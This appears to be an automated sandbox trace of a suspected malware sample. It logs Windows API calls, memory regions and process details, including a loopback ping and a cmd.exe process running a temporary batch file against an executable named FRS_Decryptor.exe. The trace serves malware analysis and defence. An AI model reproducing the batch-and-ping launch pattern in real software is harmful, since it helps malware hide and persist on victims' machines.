0x6 [0070.444] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef4c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0070.444] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.444] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb8aa8 [0070.444] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xeb8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _write (in: _FileHandle=1, _Buf=0xeb8aa8*, _MaxCharCount=0x9 | out: _Buf=0xeb8aa8*) returned 9 [0070.444] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0070.444] LocalFree (hMem=0xeb8aa8) returned 0x0 [0070.444] LocalFree (hMem=0xec7fa0) returned 0x0 [0070.444] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xb3f020, nSize=0x0, Arguments=0xb3f01c | out: lpBuffer="羠ì林³⟘\x94䰨盪✨") returned 0x9 [0070.444] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.444] GetFileType (hFile=0x28) returned 0x2 [0070.444] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3efe4 | out: lpMode=0xb3efe4) returned 0 [0070.444] GetLastError () returned 0x6 [0070.444] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3ef48, nSize=0x50 | out: lpBuffer="³✨") returned 0x0 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0070.444] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.444] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xeb89b8 [0070.444] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xeb89b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0070.444] _fileno (_File=0x76ea4c28) returned 1 [0070.444] _write (in: _FileHandle=1, _Buf=0xeb89b8*, _MaxCharCount=0x9 | out: _Buf=0xeb89b8*) returned 9 [0070.445] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0070.445] LocalFree (hMem=0xeb89b8) returned 0x0 [0070.445] LocalFree (hMem=0xec7fa0) returned 0x0 [0070.445] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xb3efa8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0070.445] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xb3ef7c, nSize=0x0, Arguments=0xb3ef78 | out: lpBuffer="羠ì³᧰\x94䰨盪❏") returned 0x5c [0070.445] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.445] GetFileType (hFile=0x28) returned 0x2 [0070.445] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3ef40 | out: lpMode=0xb3ef40) returned 0 [0070.445] GetLastError () returned 0x6 [0070.445] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3eea4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0070.445] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0070.445] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xec8068 [0070.445] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xec8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _write (in: _FileHandle=1, _Buf=0xec8068*, _MaxCharCount=0x5c | out: _Buf=0xec8068*) returned 92 [0070.445] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0070.445] LocalFree (hMem=0xec8068) returned 0x0 [0070.445] LocalFree (hMem=0xec7fa0) returned 0x0 [0070.445] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xb3ef88, nSize=0x0, Arguments=0xb3ef84 | out: lpBuffer="羠ì³ᨧ\x94䰨盪❓") returned 0x61 [0070.445] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _get_osfhandle (_FileHandle=1) returned 0x28 [0070.445] GetFileType (hFile=0x28) returned 0x2 [0070.445] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xb3ef4c | out: lpMode=0xb3ef4c) returned 0 [0070.445] GetLastError () returned 0x6 [0070.445] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xb3eeb0, nSize=0x50 | out: lpBuffer="³❓") returned 0x0 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0070.445] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0070.445] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xec8070 [0070.445] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xec8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0070.445] _fileno (_File=0x76ea4c28) returned 1 [0070.445] _write (in: _FileHandle=1, _Buf=0xec8070*, _MaxCharCount=0x61 | out: _Buf=0xec8070*) returned 97 [0070.446] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0070.446] _fileno (_File=0x76ea4c28) returned 1 [0070.446] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0070.446] LocalFree (hMem=0xec8070) returned 0x0 [0070.446] LocalFree (hMem=0xec7fa0) returned 0x0 [0070.446] IcmpCloseHandle (IcmpHandle=0xeb6bf0) returned 1 [0070.446] LocalFree (hMem=0xebc318) returned 0x0 [0070.446] LocalFree (hMem=0xec5270) returned 0x0 [0070.446] WSACleanup () returned 0 [0070.446] exit (_Code=0) Thread: id = 86 os_tid = 0x168 Thread: id = 89 os_tid = 0x8b4 Process: id = "43" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1920a000" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x94c" cmd_line = "cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\" C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe \"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2006 start_va = 0xf70000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 2007 start_va = 0xf90000 end_va = 0xf91fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 2008 start_va = 0xfa0000 end_va = 0xfaefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 2009 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 2010 start_va = 0xff0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2011 start_va = 0x10f0000 end_va = 0x10f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 2012 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 2013 start_va = 0x1110000 end_va = 0x1111fff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2014 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2015 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2016 start_va = 0x7e2f0000 end_va = 0x7e312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e2f0000" filename = "" Region: id = 2017 start_va = 0x7e315000 end_va = 0x7e315fff entry_point = 0x0 region_type = private name = "private_0x000000007e315000" filename = "" Region: id = 2018 start_va = 0x7e317000 end_va = 0x7e317fff entry_point = 0x0 region_type = private name = "private_0x000000007e317000" filename = "" Region: id = 2019 start_va = 0x7e31d000 end_va = 0x7e31ffff entry_point = 0x0 region_type = private name = "private_0x000000007e31d000" filename = "" Region: id = 2020 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2021 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2022 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2023 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2024 start_va = 0x1270000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 2025 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2026 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2027 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2035 start_va = 0xf70000 end_va = 0xf7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2036 start_va = 0x1120000 end_va = 0x119dfff entry_point = 0x1120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2037 start_va = 0x1240000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2038 start_va = 0x1420000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 2039 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2040 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2041 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2042 start_va = 0x7e1f0000 end_va = 0x7e2effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e1f0000" filename = "" Region: id = 2043 start_va = 0xf80000 end_va = 0xf83fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 2044 start_va = 0x74820000 end_va = 0x74826fff entry_point = 0x74820000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 2045 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2046 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2047 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2048 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2049 start_va = 0xf90000 end_va = 0xf93fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 2050 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2051 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2052 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 2053 start_va = 0x11b0000 end_va = 0x11b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 2054 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 2055 start_va = 0x1520000 end_va = 0x191bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001520000" filename = "" Region: id = 2056 start_va = 0x1920000 end_va = 0x1bf4fff entry_point = 0x1920000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 88 os_tid = 0x984 [0068.416] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0068.416] __set_app_type (_Type=0x1) [0068.416] __p__fmode () returned 0x76ea1768 [0068.416] __p__commode () returned 0x76ea176c [0068.416] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0068.417] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0068.417] GetCurrentThreadId () returned 0x984 [0068.417] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x984) returned 0x34 [0068.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0068.417] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0068.417] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.418] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.419] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ef874 | out: phkResult=0x10ef874*=0x0) returned 0x2 [0068.419] VirtualQuery (in: lpAddress=0x10ef883, lpBuffer=0x10ef81c, dwLength=0x1c | out: lpBuffer=0x10ef81c*(BaseAddress=0x10ef000, AllocationBase=0xff0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.419] VirtualQuery (in: lpAddress=0xff0000, lpBuffer=0x10ef81c, dwLength=0x1c | out: lpBuffer=0x10ef81c*(BaseAddress=0xff0000, AllocationBase=0xff0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.419] VirtualQuery (in: lpAddress=0xff1000, lpBuffer=0x10ef81c, dwLength=0x1c | out: lpBuffer=0x10ef81c*(BaseAddress=0xff1000, AllocationBase=0xff0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.419] VirtualQuery (in: lpAddress=0xff3000, lpBuffer=0x10ef81c, dwLength=0x1c | out: lpBuffer=0x10ef81c*(BaseAddress=0xff3000, AllocationBase=0xff0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.419] VirtualQuery (in: lpAddress=0x10f0000, lpBuffer=0x10ef81c, dwLength=0x1c | out: lpBuffer=0x10ef81c*(BaseAddress=0x10f0000, AllocationBase=0x10f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0068.419] GetConsoleOutputCP () returned 0x1b5 [0068.419] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.419] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0068.419] _get_osfhandle (_FileHandle=1) returned 0xc [0068.419] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x0) returned 1 [0068.422] _get_osfhandle (_FileHandle=1) returned 0xc [0068.422] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.422] _get_osfhandle (_FileHandle=1) returned 0xc [0068.422] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.423] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.423] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.423] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.423] SetConsoleMode (hConsoleHandle=0x8, dwMode=0x1a7) returned 1 [0068.423] GetEnvironmentStringsW () returned 0x1424180* [0068.423] FreeEnvironmentStringsA (penv="=") returned 1 [0068.423] GetEnvironmentStringsW () returned 0x1424180* [0068.424] FreeEnvironmentStringsA (penv="=") returned 1 [0068.424] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x10ee7c4 | out: phkResult=0x10ee7c4*=0x44) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x0, lpData=0x10ee7d0*=0x0, lpcbData=0x10ee7c8*=0x1000) returned 0x2 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x1, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x0, lpData=0x10ee7d0*=0x1, lpcbData=0x10ee7c8*=0x1000) returned 0x2 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x0, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x40, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x40, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x0, lpData=0x10ee7d0*=0x40, lpcbData=0x10ee7c8*=0x1000) returned 0x2 [0068.424] RegCloseKey (hKey=0x44) returned 0x0 [0068.424] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x10ee7c4 | out: phkResult=0x10ee7c4*=0x44) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x0, lpData=0x10ee7d0*=0x40, lpcbData=0x10ee7c8*=0x1000) returned 0x2 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x1, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x0, lpData=0x10ee7d0*=0x1, lpcbData=0x10ee7c8*=0x1000) returned 0x2 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x0, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x9, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x4, lpData=0x10ee7d0*=0x9, lpcbData=0x10ee7c8*=0x4) returned 0x0 [0068.424] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x10ee7cc, lpData=0x10ee7d0, lpcbData=0x10ee7c8*=0x1000 | out: lpType=0x10ee7cc*=0x0, lpData=0x10ee7d0*=0x9, lpcbData=0x10ee7c8*=0x1000) returned 0x2 [0068.424] RegCloseKey (hKey=0x44) returned 0x0 [0068.424] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5006f [0068.424] srand (_Seed=0x5aa5006f) [0068.424] GetCommandLineW () returned="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\" C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe \"" [0068.424] GetCommandLineW () returned="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\" C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe \"" [0068.424] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0068.424] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1424188, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.424] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.425] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.425] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0068.425] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b 